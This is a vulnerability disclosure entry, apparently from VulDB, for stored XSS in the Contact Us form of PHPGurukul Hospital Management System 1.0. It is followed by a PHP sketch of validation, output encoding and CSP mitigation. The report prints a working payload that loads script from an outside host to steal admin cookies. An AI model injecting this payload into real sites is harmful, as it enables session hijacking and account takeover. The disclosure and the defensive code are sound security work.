| Title | PHPGurukul Hospital Management System 1.0 Cross site scripting |
|---|
| Description | Details:
- **Affected Component:** Contact Us Form
- **Endpoint:** `https://192.168.1.12/Hospital-Management-System-PHP/hospital/index.php#contact_us`
- **Vulnerable Input Fields:** Name, Email Address, Message
- **Exploitable Payload:** `"><script src="https://js.rip/9jgolnku9i"></script>`
- **Impact:** Admin's cookies compromised upon reviewing Contact Us queries.

Recommendations:
1. Validate and sanitize user inputs.
2. Implement Content Security Policy (CSP) for XSS mitigation.
3. Promptly investigate and address this vulnerability. |
|---|
| Source | ⚠️ https://drive.google.com/file/d/1MkVtMe63h5TlZvcC_Hc1fn6dn-jwNR8l/view?usp=sharing |
|---|
| User | mallutrojan (UID 60819) |
|---|
| Submission | 01/03/2024 17:20 (2 years ago) |
|---|
| Moderation | 01/06/2024 16:43 (3 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 249843 [PHPGurukul Hospital Management System 1.0 Contact Form index.php#contact_us Name/Email/Message cross site scripting] |
|---|
| Points | 20 |
|---|
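
The first two recommendations in the description, sketched in PHP for the three Contact Us fields. This is an added example, not code from PHPGurukul or from the submitter; the function names, array keys, length limits and CSP policy string are assumptions, and the sample submission is constructed.

```php
<?php
declare(strict_types=1);

// Assumed policy: only same-origin scripts may run, so a <script src> pointing
// at another host is refused by the browser even if markup injection succeeds.
if (PHP_SAPI !== 'cli' && !headers_sent()) {
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'");
}

// Encode a stored value for use as HTML text or inside a quoted attribute.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Server-side validation of the three fields; returns the names that failed.
function validate_contact(array $in): array
{
    $bad = [];
    if (!preg_match('/^[\p{L}\p{M} .\'-]{1,100}$/u', (string)($in['name'] ?? ''))) {
        $bad[] = 'name';
    }
    if (filter_var((string)($in['email'] ?? ''), FILTER_VALIDATE_EMAIL) === false) {
        $bad[] = 'email';
    }
    $len = strlen(trim((string)($in['message'] ?? '')));
    if ($len < 1 || $len > 2000) {
        $bad[] = 'message';
    }
    return $bad;
}

// Admin-side rendering: every stored field is encoded at output time,
// whether or not it passed validation when it was submitted.
function render_query_row(array $row): string
{
    return '<tr><td>' . e($row['name']) . '</td>'
        . '<td title="' . e($row['email']) . '">' . e($row['email']) . '</td>'
        . '<td>' . nl2br(e($row['message'])) . '</td></tr>';
}

// Constructed submission with the same shape as the reported payload.
$probe = '"><script src="https://example.invalid/x.js"></script>';
$row = ['name' => $probe, 'email' => $probe, 'message' => $probe];

print_r(validate_contact($row));
echo render_query_row($row), PHP_EOL;
```

Validation rejects the sample in the name and email fields, but the message field is free text and passes, which is why encoding in the admin view is the control that matters. An inline-script-free admin page is assumed; `script-src 'self'` blocks any inline `<script>` blocks the application itself relies on.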